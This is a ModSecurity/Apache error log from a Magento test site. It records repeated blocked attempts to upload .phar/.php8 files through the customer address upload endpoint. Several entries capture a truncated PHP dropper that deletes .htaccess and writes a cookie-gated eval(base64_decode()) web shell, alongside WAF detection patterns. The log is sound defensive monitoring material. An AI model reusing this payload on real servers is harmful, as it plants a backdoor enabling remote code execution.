[Wed Dec 10 13:51:01.861968 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.phar"] [unique_id "aTlstbP2BPelBlHY7gEe2wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:02.172031 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 2888364f428d25.php8 found within FILES:custom_attributes[country_id]: 2888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTlstrP2BPelBlHY7gEe3AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/8/2888364f428d25.phar
[Wed Dec 10 13:51:02.173053 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTlstrP2BPelBlHY7gEe3AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/8/2888364f428d25.phar
[Wed Dec 10 13:51:02.173355 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTlstrP2BPelBlHY7gEe3AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/2/8/2888364f428d25.phar
[Wed Dec 10 13:51:02.358017 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Rule 7f07ac261be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.php8"] [unique_id "aTlstrP2BPelBlHY7gEe3QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:02.358545 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.php8"] [unique_id "aTlstrP2BPelBlHY7gEe3QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:02.361025 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.php8"] [unique_id "aTlstrP2BPelBlHY7gEe3QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:02.361254 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.php8"] [unique_id "aTlstrP2BPelBlHY7gEe3QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.352561 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Rule 7fb5856a6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aTpfHkf2y7b6ZcvHxt4z9wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.353072 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aTpfHkf2y7b6ZcvHxt4z9wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.355589 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aTpfHkf2y7b6ZcvHxt4z9wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.355788 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.phar"] [unique_id "aTpfHkf2y7b6ZcvHxt4z9wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.805916 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 0d88364f428d25.php8 found within FILES:custom_attributes[country_id]: 0d88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Thu Dec 11 07:05:18.806627 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Thu Dec 11 07:05:18.806829 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-AAAAAs"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/0/d/0d88364f428d25.phar
[Thu Dec 11 07:05:18.964911 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Rule 7fb5856a6be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.965417 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.968041 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 11 07:05:18.968297 2025] [:error] [pid 664040] [client 185.65.202.110:36398] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/0/d/0d88364f428d25.php8"] [unique_id "aTpfHkf2y7b6ZcvHxt4z-QAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:57.503703 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Rule 7fb585b7cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.phar"] [unique_id "aTtVIbEz7zcaAri_juZQCgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:57.504216 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.phar"] [unique_id "aTtVIbEz7zcaAri_juZQCgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:57.506700 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.phar"] [unique_id "aTtVIbEz7zcaAri_juZQCgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:57.506909 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.phar"] [unique_id "aTtVIbEz7zcaAri_juZQCgAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:57.902495 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 3l88364f428d25.php8 found within FILES:custom_attributes[country_id]: 3l88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTtVIbEz7zcaAri_juZQCwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/l/3l88364f428d25.phar
[Fri Dec 12 00:34:57.903164 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTtVIbEz7zcaAri_juZQCwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/l/3l88364f428d25.phar
[Fri Dec 12 00:34:57.903364 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTtVIbEz7zcaAri_juZQCwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/3/l/3l88364f428d25.phar
[Fri Dec 12 00:34:58.224979 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Rule 7fb585b7cbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.php8"] [unique_id "aTtVIrEz7zcaAri_juZQDAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:58.226906 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.php8"] [unique_id "aTtVIrEz7zcaAri_juZQDAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:58.231010 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.php8"] [unique_id "aTtVIrEz7zcaAri_juZQDAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 00:34:58.231245 2025] [:error] [pid 678591] [client 37.112.219.146:34746] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/3/l/3l88364f428d25.php8"] [unique_id "aTtVIrEz7zcaAri_juZQDAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Dec 12 10:04:10.889305 2025] [authz_core:error] [pid 682428] [client 206.189.225.181:37120] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Dec 12 10:04:13.785515 2025] [:error] [pid 682424] [client 206.189.225.181:37142] [client 206.189.225.181] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvajd6uoboiGY3P06OTnwAAAAA"]
[Fri Dec 12 10:04:13.785766 2025] [:error] [pid 682424] [client 206.189.225.181:37142] [client 206.189.225.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTvajd6uoboiGY3P06OTnwAAAAA"]
